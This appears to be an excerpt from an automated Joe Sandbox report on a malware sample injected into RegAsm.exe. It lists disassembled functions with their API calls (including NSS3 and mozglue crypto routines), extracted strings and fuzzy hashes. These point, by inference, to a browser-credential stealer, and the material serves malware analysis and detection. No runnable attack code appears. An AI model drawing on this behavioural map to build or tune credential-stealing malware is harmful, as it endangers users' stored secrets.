                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Pointer$Decode$CriticalEncodeEnterSection__amsg_exit__lock__mtinitlocknum
                                                                                • String ID:
                                                                                • API String ID: 2005412495-0
                                                                                • Opcode ID: d7ad628aa87005de7c3c7305d2a7bf923df02bab6eba3eea3596c736fd1a85c2
                                                                                • Instruction ID: 866b8844d8e5b8d57225da22a5ccbab491dc0a31e53e9c00afc6c61dc2336f58
                                                                                • Opcode Fuzzy Hash: d7ad628aa87005de7c3c7305d2a7bf923df02bab6eba3eea3596c736fd1a85c2
                                                                                • Instruction Fuzzy Hash: 1D316A70A0131ADFDF009FA5D9446EDBAF2BB08314F10402BE510A6251EBBC48E1DF9A
                                                                                Function 6C8DAE50 Relevance: 9.1, APIs: 6, Instructions: 85COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • PORT_NewArena_Util.NSS3(00000800), ref: 6C8DAEB3
                                                                                • SEC_ASN1EncodeUnsignedInteger_Util.NSS3(00000000,?,00000000), ref: 6C8DAECA
                                                                                • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C8DAEDD
                                                                                • PR_SetError.NSS3(FFFFE022,00000000), ref: 6C8DAF02
                                                                                • SEC_ASN1EncodeItem_Util.NSS3(?,?,?,6C9F9500), ref: 6C8DAF23
                                                                                  • Part of subcall function 6C92F080: PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?), ref: 6C92F0C8
                                                                                  • Part of subcall function 6C92F080: PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C92F122
                                                                                • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C8DAF37
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                • Associated: 00000002.00000002.2650569482.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651298310.000000006CA2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651320867.000000006CA2F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651349013.000000006CA30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651375717.000000006CA35000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: Util$Arena_$Free$EncodeError$Integer_Item_Unsigned
                                                                                • String ID:
                                                                                • API String ID: 3714604333-0
                                                                                • Opcode ID: c4306d97e3c36634be5579d730e05a059aaa59973c9399269fb2dd0da7178da2
                                                                                • Instruction ID: af4a8f6bc72ef3b49437154470fdc017f078387b15514ba432dd37ce8171ad8d
                                                                                • Opcode Fuzzy Hash: c4306d97e3c36634be5579d730e05a059aaa59973c9399269fb2dd0da7178da2
                                                                                • Instruction Fuzzy Hash: DC214C719092009BE7208F288D41BDE77E4AF9572CF254714FC589B7D0E731E54587A7
                                                                                Function 6C95EE50 Relevance: 9.1, APIs: 6, Instructions: 83memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C95EE85
                                                                                • realloc.MOZGLUE(DA5D7AA7,?), ref: 6C95EEAE
                                                                                • PORT_Alloc_Util.NSS3(?), ref: 6C95EEC5
                                                                                  • Part of subcall function 6C930BE0: malloc.MOZGLUE(6C928D2D,?,00000000,?), ref: 6C930BF8
                                                                                  • Part of subcall function 6C930BE0: TlsGetValue.KERNEL32(6C928D2D,?,00000000,?), ref: 6C930C15
                                                                                • htonl.WSOCK32(?), ref: 6C95EEE3
                                                                                • htonl.WSOCK32(00000000,?), ref: 6C95EEED
                                                                                • memcpy.VCRUNTIME140(?,?,?,00000000,?), ref: 6C95EF01
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                • Associated: 00000002.00000002.2650569482.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651298310.000000006CA2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651320867.000000006CA2F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651349013.000000006CA30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651375717.000000006CA35000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: htonl$Alloc_ErrorUtilValuemallocmemcpyrealloc
                                                                                • String ID:
                                                                                • API String ID: 1351805024-0
                                                                                • Opcode ID: f81a2827cd3ff7d835160affc6244635e14bdeac5ebfb296fc46c3eb2e8b9223
                                                                                • Instruction ID: d697da09be8c2c2e622015008522e71692bc51547a4609353cbb37200385ef95
                                                                                • Opcode Fuzzy Hash: f81a2827cd3ff7d835160affc6244635e14bdeac5ebfb296fc46c3eb2e8b9223
                                                                                • Instruction Fuzzy Hash: BC21E571A002259FDF10DF28DC8079AB7A8EF59758F548129EC099B641E735EC28CBE6
                                                                                Function 6C90EE30 Relevance: 9.1, APIs: 6, Instructions: 81memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C90EE49
                                                                                  • Part of subcall function 6C92FAB0: free.MOZGLUE(?,-00000001,?,?,6C8CF673,00000000,00000000), ref: 6C92FAC7
                                                                                • SECITEM_AllocItem_Util.NSS3(00000000,00000000,?), ref: 6C90EE5C
                                                                                • PK11_CreateContextBySymKey.NSS3(?,00000104,?,?), ref: 6C90EE77
                                                                                • PK11_CipherOp.NSS3(00000000,?,00000008,?,?,?), ref: 6C90EE9D
                                                                                • PK11_DestroyContext.NSS3(00000000,00000001), ref: 6C90EEB3
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                • Associated: 00000002.00000002.2650569482.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651298310.000000006CA2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651320867.000000006CA2F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651349013.000000006CA30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651375717.000000006CA35000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: K11_$ContextItem_Util$AllocCipherCreateDestroyZfreefree
                                                                                • String ID:
                                                                                • API String ID: 886189093-0
                                                                                • Opcode ID: c406ce7318dedb9b6bcb4b4cacb5e4229fd26394528e3ac5a67ff4d0476811dc
                                                                                • Instruction ID: fb650693d7cf8c5d1976b217aff1f0373395404d5149ab51aa125f0bcba18d91
                                                                                • Opcode Fuzzy Hash: c406ce7318dedb9b6bcb4b4cacb5e4229fd26394528e3ac5a67ff4d0476811dc
                                                                                • Instruction Fuzzy Hash: E421C3BAA002146BEB118A58DC81EAB77A8EB5974CF044568FD049B342E771DC1587F1
                                                                                Function 004199D0 Relevance: 9.0, APIs: 6, Instructions: 47COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • __getptd.LIBCMT ref: 004199DC
                                                                                  • Part of subcall function 0041A334: __getptd_noexit.LIBCMT ref: 0041A337
                                                                                  • Part of subcall function 0041A334: __amsg_exit.LIBCMT ref: 0041A344
                                                                                • __amsg_exit.LIBCMT ref: 004199FC
                                                                                • __lock.LIBCMT ref: 00419A0C
                                                                                • InterlockedDecrement.KERNEL32(?), ref: 00419A29
                                                                                • _free.LIBCMT ref: 00419A3C
                                                                                • InterlockedIncrement.KERNEL32(0042E1C0), ref: 00419A54
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.2640792644.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                                                                • String ID:
                                                                                • API String ID: 3470314060-0
                                                                                • Opcode ID: ac75dccc9862243d3894af82c885cdd0114590ba7072444d40fda745b9b04db5
                                                                                • Instruction ID: 9ead1597205a3020cd5d639c693f1539bb4abe548d641bb369b887a3e6c23b68
                                                                                • Opcode Fuzzy Hash: ac75dccc9862243d3894af82c885cdd0114590ba7072444d40fda745b9b04db5
                                                                                • Instruction Fuzzy Hash: C201A131A01652BBDB21AB6694297DE7760AF00764F48401BF800A7691D73C5DC6CBDD
                                                                                Function 00410EB9 Relevance: 9.0, APIs: 4, Strings: 2, Instructions: 36stringCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • StrStrA.SHLWAPI(?,00000104,00000001,00000000,?,00411A64,?,00000000,?,?,00000104,?,00000104,?,?,00000000), ref: 00410EC5
                                                                                • lstrcpyn.KERNEL32(C:\Users\user\Desktop\,?,00000000,00000104,?,00411A64,?,00000000,?,?,00000104,?,00000104,?,?,00000000), ref: 00410EDE
                                                                                • lstrlenA.KERNEL32(00000104,?,00411A64,?,00000000,?,?,00000104,?,00000104,?,?,00000000), ref: 00410EF0
                                                                                • wsprintfA.USER32 ref: 00410F02
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.2640792644.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: lstrcpynlstrlenwsprintf
                                                                                • String ID: %s%s$C:\Users\user\Desktop\
                                                                                • API String ID: 1206339513-438050915
                                                                                • Opcode ID: 8aecc557134a6b5c81efd88c64ae6e5cf3721d074007ce6fff9da3b286229787
                                                                                • Instruction ID: 0532199afd7fb71505dfc6c42552052b069b43126b475e5890b68da579568c33
                                                                                • Opcode Fuzzy Hash: 8aecc557134a6b5c81efd88c64ae6e5cf3721d074007ce6fff9da3b286229787
                                                                                • Instruction Fuzzy Hash: E0F054326002297BDB011F59AC48A9BBFAEEF5A765F04402AFD0893211C7765D1187E5
                                                                                Function 6C8BAE30 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 231COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CDD,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C8BAFDA
                                                                                Strings
                                                                                • %s at line %d of [%.10s], xrefs: 6C8BAFD3
                                                                                • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C8BAFC4
                                                                                • unable to delete/modify collation sequence due to active statements, xrefs: 6C8BAF5C
                                                                                • misuse, xrefs: 6C8BAFCE
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                • Associated: 00000002.00000002.2650569482.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651298310.000000006CA2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651320867.000000006CA2F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651349013.000000006CA30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651375717.000000006CA35000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: sqlite3_log
                                                                                • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$misuse$unable to delete/modify collation sequence due to active statements
                                                                                • API String ID: 632333372-924978290
                                                                                • Opcode ID: ff7b31b9844496cf8f0379a9378e57dc380ca29e06f450cbcb28bc0aa61f491e
                                                                                • Instruction ID: b3889874319b3a98c74b1c5e784415a9448414bc56a77d9f3240df364d790928
                                                                                • Opcode Fuzzy Hash: ff7b31b9844496cf8f0379a9378e57dc380ca29e06f450cbcb28bc0aa61f491e
                                                                                • Instruction Fuzzy Hash: 8E91E175B002158FDB24CF59C990AEABBF1BF49314F1948A8E865BB751D334ED06CB60
                                                                                Function 004063B1 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 103memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _EH_prolog.MSVCRT ref: 004063B6
                                                                                • memcmp.MSVCRT ref: 004063DC
                                                                                • memset.MSVCRT ref: 0040640B
                                                                                • LocalAlloc.KERNEL32(00000040,-000000E1,?,?,?,?,00000000,00000000), ref: 00406440
                                                                                  • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                  • Part of subcall function 0040F997: lstrlenA.KERNEL32(?,00000000,?,004169B9,004265B7,004265B6,00000000,00000000,?,00417314), ref: 0040F9A0
                                                                                  • Part of subcall function 0040F997: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F9D4
                                                                                  • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.2640792644.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: lstrcpy$AllocH_prologLocallstrlenmemcmpmemset
                                                                                • String ID: v10
                                                                                • API String ID: 2733184300-1337588462
                                                                                • Opcode ID: 430379befafe8ab5387d7d8327eb41e253a8c858f5480c1b1877b21b769bbced
                                                                                • Instruction ID: a2b7bcaca1c000452f3b6f2657c80f90a0423dc396e4891538442c5a8cac53a7
                                                                                • Opcode Fuzzy Hash: 430379befafe8ab5387d7d8327eb41e253a8c858f5480c1b1877b21b769bbced
                                                                                • Instruction Fuzzy Hash: A6317E71D00219ABCB10DFA5DC91AEEBB78EF04354F11813FE916B72C0D778AA18CA58
                                                                                Function 6C7EF440 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 103fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetFileInformationByHandle.KERNEL32(00000000,?), ref: 6C7EF480
                                                                                  • Part of subcall function 6C7BF100: LoadLibraryW.KERNEL32(shell32,?,6C82D020), ref: 6C7BF122
                                                                                  • Part of subcall function 6C7BF100: GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 6C7BF132
                                                                                • CloseHandle.KERNEL32(00000000), ref: 6C7EF555
                                                                                  • Part of subcall function 6C7C14B0: wcslen.API-MS-WIN-CRT-STRING-L1-1-0(6C7C1248,6C7C1248,?), ref: 6C7C14C9
                                                                                  • Part of subcall function 6C7C14B0: memcpy.VCRUNTIME140(?,6C7C1248,00000000,?,6C7C1248,?), ref: 6C7C14EF
                                                                                  • Part of subcall function 6C7BEEA0: memcpy.VCRUNTIME140(?,?,?), ref: 6C7BEEE3
                                                                                • CreateFileW.KERNEL32 ref: 6C7EF4FD
                                                                                • GetFileInformationByHandle.KERNEL32(00000000), ref: 6C7EF523
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650238110.000000006C7B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7B0000, based on PE: true
                                                                                • Associated: 00000002.00000002.2650211449.000000006C7B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2650409954.000000006C82D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2650456604.000000006C83E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2650533178.000000006C842000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c7b0000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: FileHandle$Informationmemcpy$AddressCloseCreateLibraryLoadProcwcslen
                                                                                • String ID: \oleacc.dll
                                                                                • API String ID: 2595878907-3839883404
                                                                                • Opcode ID: f6823d761f3a09129fbc3398e62d4cac578a4e726b3642c21b0d7ec3ff92e100
                                                                                • Instruction ID: 9e9526a69ce36b1b14f4d32d68af94ff3c432897a62b456a760ba7fd58f33bde
                                                                                • Opcode Fuzzy Hash: f6823d761f3a09129fbc3398e62d4cac578a4e726b3642c21b0d7ec3ff92e100
                                                                                • Instruction Fuzzy Hash: 6141D7716047109FD720DF79D944A9BB7F4AF98318F101E2CF5A593650E730D949CB92
                                                                                Function 6C8174A0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 72COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SetLastError.KERNEL32(00000000), ref: 6C817526
                                                                                • __Init_thread_footer.LIBCMT ref: 6C817566
                                                                                • __Init_thread_footer.LIBCMT ref: 6C817597
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650238110.000000006C7B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7B0000, based on PE: true
                                                                                • Associated: 00000002.00000002.2650211449.000000006C7B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2650409954.000000006C82D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2650456604.000000006C83E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2650533178.000000006C842000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c7b0000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: Init_thread_footer$ErrorLast
                                                                                • String ID: UnmapViewOfFile2$kernel32.dll
                                                                                • API String ID: 3217676052-1401603581
                                                                                • Opcode ID: 1ed8a73682eb864a3aa78f96495bf1f71ccd994cd146bd36a7057cb837b3a4cf
                                                                                • Instruction ID: 1df8fd2eecccdb2e3cea33f2b56609946ea05cd29b32e0e966fe81751a59d580
                                                                                • Opcode Fuzzy Hash: 1ed8a73682eb864a3aa78f96495bf1f71ccd994cd146bd36a7057cb837b3a4cf
                                                                                • Instruction Fuzzy Hash: A821E032708552A7CA349EE9CB0CE9A37F5EB97328B006D7DD80987F40CB30A801C6D1
                                                                                Function 0040DEB5 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 63COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • std::_Xinvalid_argument.LIBCPMT ref: 0040DECC
                                                                                  • Part of subcall function 0041E560: std::exception::exception.LIBCMT ref: 0041E575
                                                                                  • Part of subcall function 0041E560: __CxxThrowException@8.LIBCMT ref: 0041E58A
                                                                                  • Part of subcall function 0041E560: std::exception::exception.LIBCMT ref: 0041E59B
                                                                                • std::_Xinvalid_argument.LIBCPMT ref: 0040DEEE
                                                                                • memcpy.MSVCRT ref: 0040DF2B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.2640792644.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throwmemcpy
                                                                                • String ID: invalid string position$string too long
                                                                                • API String ID: 214693668-4289949731
                                                                                • Opcode ID: de2a1df18cf5d26554ea6783a315de80fe588738b6151625a04740c3031700d1
                                                                                • Instruction ID: 1b7bfbfb966d511aa30ef4aaa2d96a7292c461b53ec02d08ed85f2dd27ac607e
                                                                                • Opcode Fuzzy Hash: de2a1df18cf5d26554ea6783a315de80fe588738b6151625a04740c3031700d1
                                                                                • Instruction Fuzzy Hash: 0C11DD317003059FDB24DE98C981A6AB3E8EB45704B10497EF853EB2C2DB74E9488798
                                                                                Function 6C8C0DC0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 51stringCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • strrchr.VCRUNTIME140(00000000,0000005C,00000000,00000000,00000000,?,6C8C0BDE), ref: 6C8C0DCB
                                                                                • strrchr.VCRUNTIME140(00000000,0000005C,?,6C8C0BDE), ref: 6C8C0DEA
                                                                                • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(00000001,00000001,?,?,?,6C8C0BDE), ref: 6C8C0DFC
                                                                                • PR_LogPrint.NSS3(%s incr => %d (find lib),?,?,?,?,?,?,?,6C8C0BDE), ref: 6C8C0E32
                                                                                Strings
                                                                                • %s incr => %d (find lib), xrefs: 6C8C0E2D
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                • Associated: 00000002.00000002.2650569482.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651298310.000000006CA2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651320867.000000006CA2F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651349013.000000006CA30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651375717.000000006CA35000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: strrchr$Print_stricmp
                                                                                • String ID: %s incr => %d (find lib)
                                                                                • API String ID: 97259331-2309350800
                                                                                • Opcode ID: dc0dea0550369e115c713f34c39ef89ab5ea9dea8419a1812439c52a263731c5
                                                                                • Instruction ID: 852d31dedaaa0aebfb65258b895f3ea64a2e78ae9331b788d32b221875eb967d
                                                                                • Opcode Fuzzy Hash: dc0dea0550369e115c713f34c39ef89ab5ea9dea8419a1812439c52a263731c5
                                                                                • Instruction Fuzzy Hash: C00124B27403149FEB308F249C45E2773BCDF55A09B04482DE909D3A42EB62EC18C6E2
                                                                                Function 0040FC38 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 33memorytimeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetProcessHeap.KERNEL32(00000000,00000104,?,00000000,?,Version: ,0042654E), ref: 0040FC46
                                                                                • HeapAlloc.KERNEL32(00000000,?,00000000,?,Version: ,0042654E), ref: 0040FC4D
                                                                                • GetLocalTime.KERNEL32(00000000,?,00000000,?,Version: ,0042654E), ref: 0040FC59
                                                                                • wsprintfA.USER32 ref: 0040FC84
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.2640792644.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
